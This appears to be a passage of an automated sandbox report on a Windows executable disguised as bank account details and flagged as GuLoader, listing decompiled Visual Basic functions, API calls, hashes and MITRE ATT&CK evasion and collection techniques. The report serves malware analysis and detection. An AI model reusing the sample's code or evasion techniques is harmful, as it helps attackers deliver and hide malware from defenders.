0x00415065
0x00000000

APIs

__vbaNew2.MSVBVM60(00412434,00416E8C), ref: 00414E60
__vbaHresultCheckObj.MSVBVM60(00000000,02AAE8CC,00412424,00000014), ref: 00414E84
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412444,00000128), ref: 00414EB0
__vbaFreeObj.MSVBVM60(00000000,?,00412444,00000128), ref: 00414EC7
#648.MSVBVM60(?), ref: 00414EE7
__vbaFreeVar.MSVBVM60(?), ref: 00414EEF
__vbaNew2.MSVBVM60(00412434,00416E8C,?), ref: 00414F06
__vbaHresultCheckObj.MSVBVM60(00000000,02AAE8CC,00412424,00000014), ref: 00414F2A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412444,00000078), ref: 00414F50
__vbaFreeObj.MSVBVM60(00000000,?,00412444,00000078), ref: 00414F58
__vbaNew2.MSVBVM60(00412830,00416010), ref: 00414F82
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414F9A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412504,00000048), ref: 00414FBA
#595.MSVBVM60(?,00000000,?,?,?), ref: 00414FE2
__vbaFreeObj.MSVBVM60(?,00000000,?,?,?), ref: 00414FEA
__vbaFreeVarList.MSVBVM60(00000004,00000008,?,?,?,?,00000000,?,?,?), ref: 00415001
__vbaNew2.MSVBVM60(00412830,00416010), ref: 0041501E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415036
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412498,000001A8), ref: 00415058
__vbaFreeObj.MSVBVM60 ref: 00415060

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$#595#648List
String ID:
API String ID: 3510583189-0
Opcode ID: c699fea1be79b34a2a654da30c5101a6360a46c16af257eef3d9502c2d9dace2
Instruction ID: f2af1d5ad630fa9d13a9d1ec69f878a70174e076e2d9ceafc225b7a23f3116d9
Opcode Fuzzy Hash: c699fea1be79b34a2a654da30c5101a6360a46c16af257eef3d9502c2d9dace2
Instruction Fuzzy Hash: 73713EB1A40208ABCB10EFA5C985EDEB7F8EF49704F50416FF105F72A1DA789945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00414BC5, Relevance: 25.7, APIs: 17, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00414BC5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr __fp0, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				char _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				short _v84;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr* _t41;
				intOrPtr* _t43;
				void* _t45;
				intOrPtr* _t46;
				intOrPtr* _t48;
				void* _t50;
				intOrPtr* _t51;
				intOrPtr* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				intOrPtr* _t66;
				short _t75;
				void* _t81;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr* _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr _t109;

				_t109 = __fp0;
				_push(0x401176);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t95;
				_t96 = _t95 - 0x5c;
				_v12 = _t96;
				_v8 = 0x401148;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v84 = 0;
				L00401224();
				_t41 =  *0x416010; // 0x737d18
				if(_t41 != 0) {
					_t81 = 0x412830;
				} else {
					_t81 = 0x412830;
					_push(0x416010);
					_push(0x412830);
					L004012A8();
					_t41 =  *0x416010; // 0x737d18
				}
				_t43 =  &_v28;
				L0040123C();
				_t87 = _t43;
				_t45 =  *((intOrPtr*)( *_t87 + 0x1ac))(_t87, _t43,  *((intOrPtr*)( *_t41 + 0x334))(_t41));
				asm("fclex");
				if(_t45 < 0) {
					_push(0x1ac);
					_push(0x412498);
					_push(_t87);
					_push(_t45);
					L004012A2();
				}
				L00401296();
				_t46 =  *0x416010; // 0x737d18
				if(_t46 == 0) {
					_push(0x416010);
					_push(_t81);
					L004012A8();
					_t46 =  *0x416010; // 0x737d18
				}
				_t48 =  &_v28;
				L0040123C();
				_t88 = _t48;
				_t50 =  *((intOrPtr*)( *_t88 + 0x110))(_t88,  &_v84, _t48,  *((intOrPtr*)( *_t46 + 0x308))(_t46));
				asm("fclex");
				if(_t50 < 0) {
					_push(0x110);
					_push(0x4124c4);
					_push(_t88);
					_push(_t50);
					L004012A2();
				}
				_t51 =  *0x416010; // 0x737d18
				if(_t51 == 0) {
					_push(0x416010);
					_push(_t81);
					L004012A8();
					_t51 =  *0x416010; // 0x737d18
				}
				_t53 =  &_v32;
				L0040123C();
				_t66 = _t53;
				_t54 = 0xa;
				_v72 = 0x80020004;
				_v80 = _t54;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v56 = 0x80020004;
				_v64 = _t54;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v40 = 0x80020004;
				_t75 = _v84;
				_v48 = _t54;
				_v108 = _t75;
				asm("fild dword [ebp-0x68]");
				asm("movsd");
				_v112 = _t109;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)(_t96 - 0xfffffffffffffff0)) = _v112;
				_t56 =  *((intOrPtr*)( *_t66 + 0x1b4))(_t66, _t75, _t53,  *((intOrPtr*)( *_t51 + 0x368))(_t51));
				asm("fclex");
				if(_t56 < 0) {
					_push(0x1b4);
					_push(0x4124c4);
					_push(_t66);
					_push(_t56);
					L004012A2();
				}
				_push( &_v32);
				_push( &_v28);
				_push(2);
				L00401284();
				_t59 =  *0x416010; // 0x737d18
				if(_t59 == 0) {
					_push(0x416010);
					_push(0x412830);
					L004012A8();
					_t59 =  *0x416010; // 0x737d18
				}
				_t61 =  &_v28;
				L0040123C();
				_t92 = _t61;
				_t63 =  *((intOrPtr*)( *_t92 + 0x1bc))(_t92, _t61,  *((intOrPtr*)( *_t59 + 0x350))(_t59));
				asm("fclex");
				if(_t63 < 0) {
					_push(0x1bc);
					_push(0x4124c4);
					_push(_t92);
					_push(_t63);
					L004012A2();
				}
				L00401296();
				asm("wait");
				_push(0x414de3);
				L00401266();
				return _t63;
			}

0x00414bc5
0x00414bca
0x00414bd5
0x00414bd6
0x00414bdd
0x00414be3
0x00414be6
0x00414bf5
0x00414bf8
0x00414bfb
0x00414bfe
0x00414c01
0x00414c06
0x00414c12
0x00414c27
0x00414c14
0x00414c14
0x00414c19
0x00414c1a
0x00414c1b
0x00414c20
0x00414c20
0x00414c36
0x00414c3a
0x00414c3f
0x00414c44
0x00414c4c
0x00414c4e
0x00414c50
0x00414c55
0x00414c5a
0x00414c5b
0x00414c5c
0x00414c5c
0x00414c64
0x00414c69
0x00414c70
0x00414c72
0x00414c73
0x00414c74
0x00414c79
0x00414c79
0x00414c88
0x00414c8c
0x00414c91
0x00414c9a
0x00414ca2
0x00414ca4
0x00414ca6
0x00414cab
0x00414cb0
0x00414cb1
0x00414cb2
0x00414cb2
0x00414cb7
0x00414cbe
0x00414cc0
0x00414cc1
0x00414cc2
0x00414cc7
0x00414cc7
0x00414cd6
0x00414cda
0x00414ce1
0x00414ce3
0x00414cf1
0x00414cf4
0x00414cfa
0x00414cfb
0x00414cfc
0x00414cfd
0x00414d03
0x00414d06
0x00414d09
0x00414d0a
0x00414d0b
0x00414d0c
0x00414d15
0x00414d18
0x00414d1c
0x00414d1f
0x00414d22
0x00414d25
0x00414d26
0x00414d2c
0x00414d30
0x00414d31
0x00414d32
0x00414d36
0x00414d3e
0x00414d40
0x00414d42
0x00414d47
0x00414d4c
0x00414d4d
0x00414d4e
0x00414d4e
0x00414d56
0x00414d5a
0x00414d5b
0x00414d5d
0x00414d62
0x00414d6c
0x00414d6e
0x00414d73
0x00414d78
0x00414d7d
0x00414d7d
0x00414d8c
0x00414d90
0x00414d95
0x00414d9a
0x00414da2
0x00414da4
0x00414da6
0x00414dab
0x00414db0
0x00414db1
0x00414db2
0x00414db2
0x00414dba
0x00414dbf
0x00414dc0
0x00414ddd
0x00414de2

APIs

__vbaStrCopy.MSVBVM60 ref: 00414C01
__vbaNew2.MSVBVM60(00412830,00416010), ref: 00414C1B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414C3A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412498,000001AC), ref: 00414C5C
__vbaFreeObj.MSVBVM60 ref: 00414C64
__vbaNew2.MSVBVM60(00412830,00416010), ref: 00414C74
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414C8C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004124C4,00000110), ref: 00414CB2
__vbaNew2.MSVBVM60(00412830,00416010), ref: 00414CC2
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414CDA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004124C4,000001B4), ref: 00414D4E
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00414D5D
__vbaNew2.MSVBVM60(00412830,00416010), ref: 00414D78
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414D90
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004124C4,000001BC), ref: 00414DB2
__vbaFreeObj.MSVBVM60 ref: 00414DBA
__vbaFreeStr.MSVBVM60(00414DE3), ref: 00414DDD

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2$CopyList
String ID:
API String ID: 2016152665-0
Opcode ID: ecab7c9f6b8cb9b0555a8801acab786b58cfa46499eec89d075eda8d88d9c7ea
Instruction ID: 325212ceef2fabb5396da386f7d947683ba6ab401bac83aa92c2ff06cdc532df
Opcode Fuzzy Hash: ecab7c9f6b8cb9b0555a8801acab786b58cfa46499eec89d075eda8d88d9c7ea
Instruction Fuzzy Hash: 7F517F71A00204ABDB00EFA5C945AEF7BBCAF49704F01456FF901FB291DB789941CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00414215, Relevance: 15.1, APIs: 10, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00414215(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v40;
				intOrPtr _v48;
				char _v56;
				char _v72;
				char* _v80;
				char _v88;
				intOrPtr* _t35;
				signed short _t42;
				char* _t48;
				void* _t64;
				void* _t66;
				intOrPtr _t67;

				_t67 = _t66 - 0xc;
				 *[fs:0x0] = _t67;
				_v16 = _t67 - 0x5c;
				_v12 = 0x401108;
				_v8 = 0;
				_t35 = _a4;
				 *((intOrPtr*)( *_t35 + 4))(_t35, __edi, __esi, __ebx,  *[fs:0x0], 0x401176, _t64);
				_v80 =  &_v32;
				_push( &_v56);
				_push(0);
				_push( &_v88);
				_v56 = 0;
				_v88 = 0;
				_push( &_v72);
				_v28 = 0;
				_v32 = 0;
				_v40 = 0;
				_v72 = 0;
				_v48 = 1;
				_v56 = 2;
				_v88 = 0x4008;
				L0040126C();
				_push( &_v72);
				_t42 =  &_v40;
				_push(_t42);
				L00401272();
				_push(_t42);
				L00401278();
				asm("sbb esi, esi");
				L00401266();
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L00401260();
				_v80 =  &_v32;
				_v88 = 0x4008;
				if( ~( ~_t42 + 1) == 0) {
					_push(0);
				} else {
					_push(0xffffffff);
				}
				_push( &_v88);
				_push( &_v56);
				L00401254();
				_t48 =  &_v56;
				_push(_t48);
				L0040125A();
				L004012B4();
				L0040127E();
				_push(0x41432a);
				L00401266();
				return _t48;
			}

0x00414218
0x00414227
0x00414234
0x00414237
0x00414240
0x00414243
0x00414249
0x00414254
0x0041425a
0x0041425e
0x0041425f
0x00414263
0x00414266
0x00414269
0x0041426a
0x0041426d
0x00414270
0x00414273
0x00414276
0x0041427d
0x00414284
0x00414287
0x0041428f
0x00414290
0x00414293
0x00414294
0x00414299
0x0041429a
0x004142a8
0x004142ad
0x004142b5
0x004142b9
0x004142ba
0x004142bc
0x004142ca
0x004142cd
0x004142d0
0x004142d6
0x004142d2
0x004142d2
0x004142d2
0x004142da
0x004142de
0x004142df
0x004142e4
0x004142e7
0x004142e8
0x004142f2
0x004142fa
0x004142ff
0x00414324
0x00414329

APIs

#632.MSVBVM60(?,?,00000000,?), ref: 00414287
__vbaStrVarVal.MSVBVM60(?,?,?,?,00000000,?), ref: 00414294
#516.MSVBVM60(00000000,?,?,?,?,00000000,?), ref: 0041429A
__vbaFreeStr.MSVBVM60(00000000,?,?,?,?,00000000,?), ref: 004142AD
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00000000,?,?,?,?,00000000,?), ref: 004142BC
#617.MSVBVM60(00000002,?,00000000), ref: 004142DF
__vbaStrVarMove.MSVBVM60(00000002,00000002,?,00000000), ref: 004142E8
__vbaStrMove.MSVBVM60(00000002,00000002,?,00000000), ref: 004142F2
__vbaFreeVar.MSVBVM60(00000002,00000002,?,00000000), ref: 004142FA
__vbaFreeStr.MSVBVM60(0041432A,00000002,00000002,?,00000000), ref: 00414324

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#516#617#632List
String ID:
API String ID: 2471981182-0
Opcode ID: d9a18eb341c6f4fd537df6f48e834e96eeb6564346812530adde7313be001162
Instruction ID: 72e3d16e975040e59cd211785b31083b134853f0293c199794ac9373c87830ab
Opcode Fuzzy Hash: d9a18eb341c6f4fd537df6f48e834e96eeb6564346812530adde7313be001162
Instruction Fuzzy Hash: E331D8B1C0124CAACB00EFE6D985DDEFBBCAF44704F60816BE512F7191DA785A098B55

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Foreign_Bank Account Details.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: Foreign_Bank Account Details.exe PID: 3240 Parent PID: 6036

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: Foreign_Bank Account Details.exe PID: 3240 Parent PID: 6036 Foreign_Bank Account Details.exeCOMMON

Executed Functions

Function 004012D8, Relevance: 9.5, APIs: 2, Strings: 2, Instructions: 2548COMMONCrypto

Function 004012D8, Relevance: 9.5, APIs: 2, Strings: 2, Instructions: 2548
COMMONCrypto

Function 004022E9, Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 433
memoryCOMMONCrypto

Function 00414356, Relevance: 59.9, APIs: 33, Strings: 1, Instructions: 361
COMMON

Function 004023FB, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 384
memoryCOMMON

Function 00413DE4, Relevance: 82.6, APIs: 44, Strings: 3, Instructions: 345
COMMON

Function 00414827, Relevance: 63.3, APIs: 35, Strings: 1, Instructions: 273
COMMON

Function 00414DF6, Relevance: 30.2, APIs: 20, Instructions: 209
COMMON

Function 00414BC5, Relevance: 25.7, APIs: 17, Instructions: 186
COMMON

Function 00414215, Relevance: 15.1, APIs: 10, Instructions: 86
COMMON